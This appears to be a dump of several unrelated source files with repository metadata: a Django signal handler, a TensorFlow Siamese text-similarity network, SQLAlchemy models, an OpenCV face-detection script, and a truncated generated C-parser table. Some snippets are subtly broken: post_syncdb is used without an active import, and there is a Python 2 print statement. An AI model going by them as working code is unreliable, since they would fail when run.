# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# We kindly request you to use one or more of the following phrases to refer to
# foxBMS in your hardware, software, documentation or advertising materials:
#
# - "This product uses parts of foxBMS®"
# - "This product includes parts of foxBMS®"
# - "This product is derived from foxBMS®"
# f_guidelines is not a proper python module name, but this is OK since we need
# it just for the unit test discovery
# pylint: disable-all
| [
"info@foxbms.org"
] | info@foxbms.org |
ced52954601fbdcf1fa084b29d93f2b704f2dc9e | afc7c607537dd2cb9a88d3fa44c660dbd375cb72 | /hdb/management/__init__.py | 4a76395d4c1a3a677a8437bccdd367620488e925 | [] | no_license | twoolie/hostdb | fff98a0719e4bf18f82a211ed325f0620761d3f0 | 3cfa729155b355790e5bddf08ee0aeb7592eb3b1 | refs/heads/master | 2021-01-23T15:43:05.362550 | 2011-03-19T03:47:53 | 2011-03-19T03:47:53 | 1,494,864 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 375 | py | import models
#from django.db.models import signals, get_apps, get_models
from django.dispatch import receiver
@receiver(post_syncdb, sender=models)
def init_data(app, created_models, verbosity, **kwargs):
if models.DNSZone in created_models:
zone = models.DNSZone(
zonename="Global",
ttl = 43200 # 12Hr TTL
)
zone.save()
| [
"rocker.of.beds@gmail.com"
] | rocker.of.beds@gmail.com |
0fcd767243f2e22f1a5096700c27daf46505043f | b921bcf70d7595e6adadd710604b021172256ec6 | /siamese_network_semantic.py | 4f1951ae67741773085a8537ae14081a041af9e7 | [
"MIT"
] | permissive | fossabot/deep-siamese-text-similarity | 390e1aad1a84ef326e450cd5dffeec387a8b86af | 7de9d2c458caa553219cfdd3201d8105fdfd64c9 | refs/heads/master | 2020-03-20T23:23:26.526906 | 2018-06-19T05:29:26 | 2018-06-19T05:29:26 | 137,844,122 | 0 | 0 | null | 2018-06-19T05:29:25 | 2018-06-19T05:29:25 | null | UTF-8 | Python | false | false | 3,804 | py | import tensorflow as tf
import numpy as np
class SiameseLSTMw2v(object):
"""
A LSTM based deep Siamese network for text similarity.
Uses an word embedding layer (looks up in pre-trained w2v), followed by a biLSTM and Energy Loss layer.
"""
def stackedRNN(self, x, dropout, scope, embedding_size, sequence_length, hidden_units):
n_hidden=hidden_units
n_layers=3
# Prepare data shape to match `static_rnn` function requirements
x = tf.unstack(tf.transpose(x, perm=[1, 0, 2]))
# print(x)
# Define lstm cells with tensorflow
# Forward direction cell
with tf.name_scope("fw"+scope),tf.variable_scope("fw"+scope):
stacked_rnn_fw = []
for _ in range(n_layers):
fw_cell = tf.nn.rnn_cell.BasicLSTMCell(n_hidden, forget_bias=1.0, state_is_tuple=True)
lstm_fw_cell = tf.contrib.rnn.DropoutWrapper(fw_cell,output_keep_prob=dropout)
stacked_rnn_fw.append(lstm_fw_cell)
lstm_fw_cell_m = tf.nn.rnn_cell.MultiRNNCell(cells=stacked_rnn_fw, state_is_tuple=True)
outputs, _ = tf.nn.static_rnn(lstm_fw_cell_m, x, dtype=tf.float32)
return outputs[-1]
def contrastive_loss(self, y,d,batch_size):
tmp= y *tf.square(d)
#tmp= tf.mul(y,tf.square(d))
tmp2 = (1-y) *tf.square(tf.maximum((1 - d),0))
return tf.reduce_sum(tmp +tmp2)/batch_size/2
def __init__(
self, sequence_length, vocab_size, embedding_size, hidden_units, l2_reg_lambda, batch_size, trainableEmbeddings):
# Placeholders for input, output and dropout
self.input_x1 = tf.placeholder(tf.int32, [None, sequence_length], name="input_x1")
self.input_x2 = tf.placeholder(tf.int32, [None, sequence_length], name="input_x2")
self.input_y = tf.placeholder(tf.float32, [None], name="input_y")
self.dropout_keep_prob = tf.placeholder(tf.float32, name="dropout_keep_prob")
# Keeping track of l2 regularization loss (optional)
l2_loss = tf.constant(0.0, name="l2_loss")
# Embedding layer
with tf.name_scope("embedding"):
self.W = tf.Variable(
tf.constant(0.0, shape=[vocab_size, embedding_size]),
trainable=trainableEmbeddings,name="W")
self.embedded_words1 = tf.nn.embedding_lookup(self.W, self.input_x1)
self.embedded_words2 = tf.nn.embedding_lookup(self.W, self.input_x2)
print self.embedded_words1
# Create a convolution + maxpool layer for each filter size
with tf.name_scope("output"):
self.out1=self.stackedRNN(self.embedded_words1, self.dropout_keep_prob, "side1", embedding_size, sequence_length, hidden_units)
self.out2=self.stackedRNN(self.embedded_words2, self.dropout_keep_prob, "side2", embedding_size, sequence_length, hidden_units)
self.distance = tf.sqrt(tf.reduce_sum(tf.square(tf.subtract(self.out1,self.out2)),1,keep_dims=True))
self.distance = tf.div(self.distance, tf.add(tf.sqrt(tf.reduce_sum(tf.square(self.out1),1,keep_dims=True)),tf.sqrt(tf.reduce_sum(tf.square(self.out2),1,keep_dims=True))))
self.distance = tf.reshape(self.distance, [-1], name="distance")
with tf.name_scope("loss"):
self.loss = self.contrastive_loss(self.input_y,self.distance, batch_size)
#### Accuracy computation is outside of this class.
with tf.name_scope("accuracy"):
self.temp_sim = tf.subtract(tf.ones_like(self.distance),tf.rint(self.distance)) #auto threshold 0.5
correct_predictions = tf.equal(self.temp_sim, self.input_y)
self.accuracy=tf.reduce_mean(tf.cast(correct_predictions, "float"), name="accuracy")
| [
"dhwaj.raj@insideview.com"
] | dhwaj.raj@insideview.com |
da340106c28b5d5851925721f44c780d482c7c28 | b478153a40d9d3f1f1026d5492812a43c5a77b85 | /database-backend/account_manage/account_models.py | 2063eae5262e5de11e456fb4d1f298e31b438ae9 | [
"MIT"
] | permissive | teamwong111/Database-Course | d373b709ff5bee513d44a76796e55c4db6ae89b7 | 6e28770173ca9485aaf0958d6581e5ef4a16a7ae | refs/heads/main | 2023-06-03T20:17:11.105109 | 2021-06-17T14:30:03 | 2021-06-17T14:30:03 | 343,795,652 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,365 | py | import sys
from sqlalchemy.sql.expression import true
from db_manage.sql import db
sys.path.append("..")
class User(db.Model):
__tablename__ = 'User'
user_id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False, index=True)
name = db.Column(db.String(80), nullable=False)
account = db.Column(db.String(120), unique=True, nullable=False)
password = db.Column(db.String(120), nullable=False)
portrait = db.Column(db.String(80), nullable=False, default="http://212.64.38.61/tools/head.jpg")
def to_json(self):
dict = self.__dict__
if "_sa_instance_state" in dict:
del dict["_sa_instance_state"]
return dict
def __repr__(self):
return '<User %r>' % self.name
class Bodydata(db.Model):
__tablename__ = 'Bodydata'
bodydata_id = db.Column(db.Integer, primary_key=True, unique=True, nullable=False)
height = db.Column(db.Float, nullable=False)
weight = db.Column(db.Float, nullable=False)# 体重文档错了
bmi = db.Column(db.Float, nullable=False)
heart_rate = db.Column(db.Float, nullable=False)
user_id = db.Column(db.Integer, db.ForeignKey('User.user_id'), nullable=False)
def to_json(self):
dict = self.__dict__
if "_sa_instance_state" in dict:
del dict["_sa_instance_state"]
return dict
| [
"841713301@qq.com"
] | 841713301@qq.com |
44e6ffb7623b1324b2583fdd3de7b0bcab80cb38 | 4646f21ea5a834952eaaf90492873a236c90e244 | /FaceDetection.py | 6a8fa920ad884373a844ca94e0213125d4194e32 | [] | no_license | ThunderZeus99/Face-Recognition | 045aee1bd843a8959bfa6dfe2b02f503bddf06e3 | 46a472fac752686318dbfbc0b30e98dc7436a865 | refs/heads/main | 2023-08-20T16:35:34.373527 | 2021-10-10T11:52:06 | 2021-10-10T11:52:06 | 415,568,752 | 0 | 0 | null | 2021-10-10T11:40:40 | 2021-10-10T11:40:39 | null | UTF-8 | Python | false | false | 1,031 | py | import cv2
trained_face_data = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
webcam = cv2.VideoCapture(0)
while True:
successful_frame_read , frame = webcam.read()
#to apply the alreaday trained haarcascade model we will convert the real time video frames to grayscale
grayscaled_frame = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)
#to identify face , we will use face coordinates
face_coordinates = trained_face_data.detectMultiScale(grayscaled_frame)
#face_coordinates contains 4 tuples x,y for the starting rectange and w and h for the dimension of rectange
for (x,y,w,h) in face_coordinates:
cv2.rectangle(frame, (x,y), (x+w,y+h), (0,0,255),5)
#last 2 statements is for color and thickness to place in the screen
cv2.imshow("Sohail's face detection using haar cascade", frame)
key = cv2.waitKey(1)
#argument in waitKey will tell to refresh at x ms
if (key == 81 or key == 113):
break
webcam.release()
cv2.destroyAllWindows() | [
"noreply@github.com"
] | ThunderZeus99.noreply@github.com |
0f90d491156e9da7d0fbbaa8e57e2a5475cdfeba | da0bfca935f6f73ceb26d6cfbde85b2bc7cf65d3 | /my_options/key_generation_options.py | 151925728682937f229f173e3d479ee52a85ba4f | [
"MIT"
] | permissive | ASU-APG/decentralized_attribution_of_generative_models | c0070a2e33b178bf7745c681c9f62bac67cc2e57 | b57c38b215cff4df24744262ffa02d41c61151ac | refs/heads/master | 2023-03-22T09:16:01.828670 | 2021-03-22T03:46:53 | 2021-03-22T03:46:53 | 328,608,508 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 548 | py | from my_options.my_base_option import BaseOptions
class Key_Generation_Options(BaseOptions):
def initialize(self, parser):
BaseOptions.initialize(self, parser)
#parser.add_argument('--previous_experiment', required=True, help='Location of key 1')
parser.add_argument('--how_many_key', required=True, type=int, default=1, help='How many key do you want to train')
parser.add_argument('--additional_key_training', action="store_true", default=False ,help='If this is additional key trainig')
return parser | [
"ckim79@asu.edu"
] | ckim79@asu.edu |
ce9fd1850a2bc4f39639a4196866dcd26755a4ce | cc20abf4865e57bd4b4c99357c98f78a72dcc687 | /2-dimensional/1/1-7.py | 0d198719dfbeb69fd6bcc5c70e20baba1af9503a | [] | no_license | MinkiChung/code_up_100 | 10549478f4eef46fb282b0d5476267fd4b4a03ef | a621265ef62bbe2df312f6fb8f55857825b54eee | refs/heads/master | 2023-09-01T18:26:53.693409 | 2021-10-31T15:58:57 | 2021-10-31T15:58:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 258 | py | n, m = map(int, input().split())
d = []
for i in range(n):
d.append([])
for i in range(n):
for j in range((i+1)+(m-1)*n, i, -n):
d[i].append(j)
for i in range(n-1, -1, -1):
for j in range(m):
print(d[i][j], end=' ')
print() | [
"jmk05099@ggmail.com"
] | jmk05099@ggmail.com |
42ddf77f650e31988b576c83bb98de208ccc1a47 | 151c91748160dac3fbacce495bec1c82364b5e29 | /src/parsetab.py | 5bd5bb85e1822f6185e5ea3df69ce45b2ff2ad16 | [] | no_license | haoozi/CFormatter | 0321e49ea4fb9a61d03e606ae0de1e7f6d09f1fc | 6d2bac538094e465bf6d1e2de9b2a86d4db23fd5 | refs/heads/master | 2020-05-31T12:28:06.790648 | 2019-06-06T18:49:53 | 2019-06-06T18:49:53 | 190,281,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 169,507 | py |
# parsetab.py
# This file is automatically generated. Do not edit.
# pylint: disable=W,C,R
_tabversion = '3.10'
_lr_method = 'LALR'
_lr_signature = 'translation_unit_or_emptyleftLORleftLANDleftORleftXORleftANDleftEQNEleftGTGELTLEleftRSHIFTLSHIFTleftPLUSMINUSleftTIMESDIVIDEMODAND ANDEQUAL ARROW AUTO BREAK CASE CHAR CHAR_CONST COLON COMMA CONDOP CONST CONTINUE DEFAULT DIVEQUAL DIVIDE DO DOUBLE ELLIPSIS ELSE ENUM EQ EQUALS EXTERN FLOAT FLOAT_CONST FOR GE GOTO GT HEX_FLOAT_CONST ID IF INLINE INT INT_CONST_BIN INT_CONST_DEC INT_CONST_HEX INT_CONST_OCT LAND LBRACE LBRACKET LE LNOT LONG LOR LPAREN LSHIFT LSHIFTEQUAL LT MINUS MINUSEQUAL MINUSMINUS MOD MODEQUAL NE NOT OFFSETOF OR OREQUAL PERIOD PLUS PLUSEQUAL PLUSPLUS PPHASH PPPRAGMA PPPRAGMASTR RBRACE RBRACKET REGISTER RESTRICT RETURN RPAREN RSHIFT RSHIFTEQUAL SEMI SHORT SIGNED SIZEOF STATIC STRING_LITERAL STRUCT SWITCH TIMES TIMESEQUAL TYPEDEF TYPEID UNION UNSIGNED VOID VOLATILE WCHAR_CONST WHILE WSTRING_LITERAL XOR XOREQUAL _BOOL _COMPLEX __INT128abstract_declarator_opt : empty\n| abstract_declaratorassignment_expression_opt : empty\n| assignment_expressionblock_item_list_opt : empty\n| block_item_listdeclaration_list_opt : empty\n| declaration_listdeclaration_specifiers_no_type_opt : empty\n| declaration_specifiers_no_typedesignation_opt : empty\n| designationexpression_opt : empty\n| expressionid_init_declarator_list_opt : empty\n| id_init_declarator_listidentifier_list_opt : empty\n| identifier_listinit_declarator_list_opt : empty\n| init_declarator_listinitializer_list_opt : empty\n| initializer_listparameter_type_list_opt : empty\n| parameter_type_liststruct_declarator_list_opt : empty\n| struct_declarator_listtype_qualifier_list_opt : empty\n| type_qualifier_list direct_id_declarator : ID\n direct_id_declarator : LPAREN id_declarator RPAREN\n direct_id_declarator : direct_id_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_id_declarator : direct_id_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_id_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_id_declarator : direct_id_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_id_declarator : direct_id_declarator LPAREN parameter_type_list RPAREN\n | direct_id_declarator LPAREN identifier_list_opt RPAREN\n direct_typeid_declarator : TYPEID\n direct_typeid_declarator : LPAREN typeid_declarator RPAREN\n direct_typeid_declarator : direct_typeid_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_typeid_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_typeid_declarator : direct_typeid_declarator LPAREN parameter_type_list RPAREN\n | direct_typeid_declarator LPAREN identifier_list_opt RPAREN\n direct_typeid_noparen_declarator : TYPEID\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt assignment_expression_opt RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET STATIC type_qualifier_list_opt assignment_expression RBRACKET\n | direct_typeid_noparen_declarator LBRACKET type_qualifier_list STATIC assignment_expression RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LBRACKET type_qualifier_list_opt TIMES RBRACKET\n direct_typeid_noparen_declarator : direct_typeid_noparen_declarator LPAREN parameter_type_list RPAREN\n | direct_typeid_noparen_declarator LPAREN identifier_list_opt RPAREN\n id_declarator : direct_id_declarator\n id_declarator : pointer direct_id_declarator\n typeid_declarator : direct_typeid_declarator\n typeid_declarator : pointer direct_typeid_declarator\n typeid_noparen_declarator : direct_typeid_noparen_declarator\n typeid_noparen_declarator : pointer direct_typeid_noparen_declarator\n translation_unit_or_empty : translation_unit\n | empty\n translation_unit : external_declaration\n translation_unit : translation_unit external_declaration\n external_declaration : function_definition\n external_declaration : declaration\n external_declaration : pp_directive\n | pppragma_directive\n external_declaration : SEMI\n pp_directive : PPHASH\n pppragma_directive : PPPRAGMA\n | PPPRAGMA PPPRAGMASTR\n function_definition : id_declarator declaration_list_opt compound_statement\n function_definition : declaration_specifiers id_declarator declaration_list_opt compound_statement\n statement : labeled_statement\n | expression_statement\n | compound_statement\n | selection_statement\n | iteration_statement\n | jump_statement\n | pppragma_directive\n pragmacomp_or_statement : pppragma_directive statement\n | statement\n decl_body : declaration_specifiers init_declarator_list_opt\n | declaration_specifiers_no_type id_init_declarator_list_opt\n declaration : decl_body SEMI\n declaration_list : declaration\n | declaration_list declaration\n declaration_specifiers_no_type : type_qualifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : storage_class_specifier declaration_specifiers_no_type_opt\n declaration_specifiers_no_type : function_specifier declaration_specifiers_no_type_opt\n declaration_specifiers : declaration_specifiers type_qualifier\n declaration_specifiers : declaration_specifiers storage_class_specifier\n declaration_specifiers : declaration_specifiers function_specifier\n declaration_specifiers : declaration_specifiers type_specifier_no_typeid\n declaration_specifiers : type_specifier\n declaration_specifiers : declaration_specifiers_no_type type_specifier\n storage_class_specifier : AUTO\n | REGISTER\n | STATIC\n | EXTERN\n | TYPEDEF\n function_specifier : INLINE\n type_specifier_no_typeid : VOID\n | _BOOL\n | CHAR\n | SHORT\n | INT\n | LONG\n | FLOAT\n | DOUBLE\n | _COMPLEX\n | SIGNED\n | UNSIGNED\n | __INT128\n type_specifier : typedef_name\n | enum_specifier\n | struct_or_union_specifier\n | type_specifier_no_typeid\n type_qualifier : CONST\n | RESTRICT\n | VOLATILE\n init_declarator_list : init_declarator\n | init_declarator_list COMMA init_declarator\n init_declarator : declarator\n | declarator EQUALS initializer\n id_init_declarator_list : id_init_declarator\n | id_init_declarator_list COMMA init_declarator\n id_init_declarator : id_declarator\n | id_declarator EQUALS initializer\n specifier_qualifier_list : specifier_qualifier_list type_specifier_no_typeid\n specifier_qualifier_list : specifier_qualifier_list type_qualifier\n specifier_qualifier_list : type_specifier\n specifier_qualifier_list : type_qualifier_list type_specifier\n struct_or_union_specifier : struct_or_union ID\n | struct_or_union TYPEID\n struct_or_union_specifier : struct_or_union brace_open struct_declaration_list brace_close\n | struct_or_union brace_open brace_close\n struct_or_union_specifier : struct_or_union ID brace_open struct_declaration_list brace_close\n | struct_or_union ID brace_open brace_close\n | struct_or_union TYPEID brace_open struct_declaration_list brace_close\n | struct_or_union TYPEID brace_open brace_close\n struct_or_union : STRUCT\n | UNION\n struct_declaration_list : struct_declaration\n | struct_declaration_list struct_declaration\n struct_declaration : specifier_qualifier_list struct_declarator_list_opt SEMI\n struct_declaration : SEMI\n struct_declaration : pppragma_directive\n struct_declarator_list : struct_declarator\n | struct_declarator_list COMMA struct_declarator\n struct_declarator : declarator\n struct_declarator : declarator COLON constant_expression\n | COLON constant_expression\n enum_specifier : ENUM ID\n | ENUM TYPEID\n enum_specifier : ENUM brace_open enumerator_list brace_close\n enum_specifier : ENUM ID brace_open enumerator_list brace_close\n | ENUM TYPEID brace_open enumerator_list brace_close\n enumerator_list : enumerator\n | enumerator_list COMMA\n | enumerator_list COMMA enumerator\n enumerator : ID\n | ID EQUALS constant_expression\n declarator : id_declarator\n | typeid_declarator\n pointer : TIMES type_qualifier_list_opt\n | TIMES type_qualifier_list_opt pointer\n type_qualifier_list : type_qualifier\n | type_qualifier_list type_qualifier\n parameter_type_list : parameter_list\n | parameter_list COMMA ELLIPSIS\n parameter_list : parameter_declaration\n | parameter_list COMMA parameter_declaration\n parameter_declaration : declaration_specifiers id_declarator\n | declaration_specifiers typeid_noparen_declarator\n parameter_declaration : declaration_specifiers abstract_declarator_opt\n identifier_list : identifier\n | identifier_list COMMA identifier\n initializer : assignment_expression\n initializer : brace_open initializer_list_opt brace_close\n | brace_open initializer_list COMMA brace_close\n initializer_list : designation_opt initializer\n | initializer_list COMMA designation_opt initializer\n designation : designator_list EQUALS\n designator_list : designator\n | designator_list designator\n designator : LBRACKET constant_expression RBRACKET\n | PERIOD identifier\n type_name : specifier_qualifier_list abstract_declarator_opt\n abstract_declarator : pointer\n abstract_declarator : pointer direct_abstract_declarator\n abstract_declarator : direct_abstract_declarator\n direct_abstract_declarator : LPAREN abstract_declarator RPAREN direct_abstract_declarator : direct_abstract_declarator LBRACKET assignment_expression_opt RBRACKET\n direct_abstract_declarator : LBRACKET assignment_expression_opt RBRACKET\n direct_abstract_declarator : direct_abstract_declarator LBRACKET TIMES RBRACKET\n direct_abstract_declarator : LBRACKET TIMES RBRACKET\n direct_abstract_declarator : direct_abstract_declarator LPAREN parameter_type_list_opt RPAREN\n direct_abstract_declarator : LPAREN parameter_type_list_opt RPAREN\n block_item : declaration\n | statement\n block_item_list : block_item\n | block_item_list block_item\n compound_statement : brace_open block_item_list_opt brace_close labeled_statement : ID COLON pragmacomp_or_statement labeled_statement : CASE constant_expression COLON pragmacomp_or_statement labeled_statement : DEFAULT COLON pragmacomp_or_statement selection_statement : IF LPAREN expression RPAREN pragmacomp_or_statement selection_statement : IF LPAREN expression RPAREN statement ELSE pragmacomp_or_statement selection_statement : SWITCH LPAREN expression RPAREN pragmacomp_or_statement iteration_statement : WHILE LPAREN expression RPAREN pragmacomp_or_statement iteration_statement : DO pragmacomp_or_statement WHILE LPAREN expression RPAREN SEMI iteration_statement : FOR LPAREN expression_opt SEMI expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement iteration_statement : FOR LPAREN declaration expression_opt SEMI expression_opt RPAREN pragmacomp_or_statement jump_statement : GOTO ID SEMI jump_statement : BREAK SEMI jump_statement : CONTINUE SEMI jump_statement : RETURN expression SEMI\n | RETURN SEMI\n expression_statement : expression_opt SEMI expression : assignment_expression\n | expression COMMA assignment_expression\n typedef_name : TYPEID assignment_expression : conditional_expression\n | unary_expression assignment_operator assignment_expression\n assignment_operator : EQUALS\n | XOREQUAL\n | TIMESEQUAL\n | DIVEQUAL\n | MODEQUAL\n | PLUSEQUAL\n | MINUSEQUAL\n | LSHIFTEQUAL\n | RSHIFTEQUAL\n | ANDEQUAL\n | OREQUAL\n constant_expression : conditional_expression conditional_expression : binary_expression\n | binary_expression CONDOP expression COLON conditional_expression\n binary_expression : cast_expression\n | binary_expression TIMES binary_expression\n | binary_expression DIVIDE binary_expression\n | binary_expression MOD binary_expression\n | binary_expression PLUS binary_expression\n | binary_expression MINUS binary_expression\n | binary_expression RSHIFT binary_expression\n | binary_expression LSHIFT binary_expression\n | binary_expression LT binary_expression\n | binary_expression LE binary_expression\n | binary_expression GE binary_expression\n | binary_expression GT binary_expression\n | binary_expression EQ binary_expression\n | binary_expression NE binary_expression\n | binary_expression AND binary_expression\n | binary_expression OR binary_expression\n | binary_expression XOR binary_expression\n | binary_expression LAND binary_expression\n | binary_expression LOR binary_expression\n cast_expression : unary_expression cast_expression : LPAREN type_name RPAREN cast_expression unary_expression : postfix_expression unary_expression : PLUSPLUS unary_expression\n | MINUSMINUS unary_expression\n | unary_operator cast_expression\n unary_expression : SIZEOF unary_expression\n | SIZEOF LPAREN type_name RPAREN\n unary_operator : AND\n | TIMES\n | PLUS\n | MINUS\n | NOT\n | LNOT\n postfix_expression : primary_expression postfix_expression : postfix_expression LBRACKET expression RBRACKET postfix_expression : postfix_expression LPAREN argument_expression_list RPAREN\n | postfix_expression LPAREN RPAREN\n postfix_expression : postfix_expression PERIOD ID\n | postfix_expression PERIOD TYPEID\n | postfix_expression ARROW ID\n | postfix_expression ARROW TYPEID\n postfix_expression : postfix_expression PLUSPLUS\n | postfix_expression MINUSMINUS\n postfix_expression : LPAREN type_name RPAREN brace_open initializer_list brace_close\n | LPAREN type_name RPAREN brace_open initializer_list COMMA brace_close\n primary_expression : identifier primary_expression : constant primary_expression : unified_string_literal\n | unified_wstring_literal\n primary_expression : LPAREN expression RPAREN primary_expression : OFFSETOF LPAREN type_name COMMA offsetof_member_designator RPAREN\n offsetof_member_designator : identifier\n | offsetof_member_designator PERIOD identifier\n | offsetof_member_designator LBRACKET expression RBRACKET\n argument_expression_list : assignment_expression\n | argument_expression_list COMMA assignment_expression\n identifier : ID constant : INT_CONST_DEC\n | INT_CONST_OCT\n | INT_CONST_HEX\n | INT_CONST_BIN\n constant : FLOAT_CONST\n | HEX_FLOAT_CONST\n constant : CHAR_CONST\n | WCHAR_CONST\n unified_string_literal : STRING_LITERAL\n | unified_string_literal STRING_LITERAL\n unified_wstring_literal : WSTRING_LITERAL\n | unified_wstring_literal WSTRING_LITERAL\n brace_open : LBRACE\n brace_close : RBRACE\n empty : '
_lr_action_items = {'$end':([0,1,2,3,4,5,6,7,8,9,13,14,55,77,78,105,144,210,264,],[-309,0,-58,-59,-60,-62,-63,-64,-65,-66,-67,-68,-61,-83,-69,-70,-308,-71,-202,]),'SEMI':([0,2,4,5,6,7,8,9,11,12,13,14,15,17,18,19,20,21,22,23,25,27,28,29,30,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,55,60,61,62,63,64,65,66,67,69,70,72,73,74,75,76,77,78,81,82,83,84,85,86,87,88,89,90,91,92,98,99,101,102,103,104,105,106,108,110,127,131,139,140,141,142,143,144,145,146,147,148,151,152,153,154,155,156,157,158,159,160,161,162,163,166,169,172,175,176,177,178,179,180,181,182,186,192,195,196,197,198,200,201,202,203,204,205,206,207,208,209,210,211,212,213,214,227,228,242,243,246,249,250,251,252,253,254,255,256,257,258,259,260,261,263,264,265,266,267,269,270,272,273,282,283,284,285,286,287,288,289,325,326,327,329,330,331,333,334,349,350,351,352,371,372,375,376,377,380,381,382,384,387,391,395,396,397,398,399,400,402,403,404,405,406,407,408,409,410,411,412,413,414,415,416,417,418,419,422,424,425,426,427,431,438,439,442,443,456,457,458,460,462,463,464,466,467,469,470,473,475,479,480,490,491,493,494,496,498,507,508,510,513,518,519,520,522,525,526,528,],[9,9,-60,-62,-63,-64,-65,-66,-309,77,-67,-68,-52,-309,-309,-309,-116,-93,-309,-29,-97,-113,-114,-115,-221,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-61,-309,-309,-162,-89,-90,-91,-92,-81,-19,-20,-120,-122,-163,-54,-37,-83,-69,-53,-86,-9,-10,-87,-88,-94,-82,-15,-16,-124,-126,-152,-153,-307,-132,-133,146,-70,-309,-162,-55,-294,-30,146,146,146,-135,-142,-308,-309,-145,-146,-130,-13,-309,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,-294,273,-14,-309,286,287,289,-219,-222,-257,-236,-259,-238,-271,-283,-284,-285,-286,-295,-296,-297,-298,-299,-300,-301,-302,-303,-305,-71,-121,-38,-123,-177,-35,-36,-125,-127,-154,146,-137,146,-139,-134,-143,377,-128,-129,-25,-26,-147,-149,-131,-202,-201,-13,-309,-235,-257,-309,-218,-78,-80,-309,398,-214,-215,399,-217,-279,-280,-260,-261,-262,-263,-304,-306,-43,-44,-31,-34,-155,-156,-136,-138,-144,-151,-203,-309,-205,-287,-220,-79,466,-309,-213,-216,-223,-239,-240,-241,-242,-243,-244,-245,-246,-247,-248,-249,-250,-251,-252,-253,-254,-255,-256,-274,-275,-276,-277,-278,-178,-39,-42,-32,-33,-148,-150,-204,-309,-258,-309,-309,-309,497,-272,-273,-264,-179,-40,-41,-206,-80,-208,-209,511,-237,-309,-281,520,-288,-207,-282,-210,-309,-309,-212,-211,]),'PPHASH':([0,2,4,5,6,7,8,9,13,14,55,77,78,105,144,210,264,],[13,13,-60,-62,-63,-64,-65,-66,-67,-68,-61,-83,-69,-70,-308,-71,-202,]),'PPPRAGMA':([0,2,4,5,6,7,8,9,13,14,55,77,78,101,104,105,106,139,140,141,143,144,146,147,152,153,154,155,156,157,158,159,160,161,162,172,210,249,251,254,264,265,267,272,273,282,283,286,287,289,377,381,382,384,395,398,399,458,460,463,464,490,491,493,494,507,518,520,522,525,526,528,],[14,14,-60,-62,-63,-64,-65,-66,-67,-68,-61,-83,-69,-307,14,-70,14,14,14,14,-142,-308,-145,-146,14,-200,-198,-199,-72,-73,-74,-75,-76,-77,-78,14,-71,14,14,-143,-202,-201,14,14,-218,14,-80,-214,-215,-217,-144,-203,14,-205,-79,-213,-216,-204,14,14,14,-206,-80,-208,-209,14,-207,-210,14,14,-212,-211,]),'ID':([0,2,4,5,6,7,8,9,11,13,14,16,17,18,19,20,21,22,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,60,61,63,64,65,66,68,71,77,78,79,80,82,83,84,85,86,87,94,95,96,97,98,99,100,101,102,103,105,106,111,113,114,115,116,117,118,126,129,130,132,133,134,135,142,144,145,148,152,153,154,155,156,157,158,159,160,161,162,164,168,172,174,177,183,184,185,187,188,189,190,191,193,194,210,215,216,217,218,222,225,226,230,234,238,239,246,247,248,250,252,253,256,257,262,263,264,265,267,271,272,273,274,278,279,280,282,283,284,286,287,289,290,291,292,293,294,295,296,297,298,299,300,301,302,303,304,305,306,307,308,309,310,311,312,313,314,315,316,317,318,319,320,321,322,323,324,328,332,338,339,340,343,344,346,347,348,360,361,364,368,369,371,372,375,376,378,379,381,382,384,386,395,397,398,399,432,434,444,445,446,454,458,459,460,461,463,464,465,466,468,471,474,476,477,482,483,484,490,491,493,494,497,507,509,511,514,515,518,520,522,525,526,528,],[23,23,-60,-62,-63,-64,-65,-66,23,-67,-68,23,-309,-309,-309,-116,-93,23,23,-97,-309,-113,-114,-115,-221,98,102,-101,-102,-103,-104,-105,-106,-107,-108,-109,-110,-111,-112,-117,-118,-119,-95,-96,-98,-99,-100,-140,-141,-61,23,23,-89,-90,-91,-92,23,23,-83,-69,-309,127,-86,-9,-10,-87,-88,-94,-164,-27,-28,-1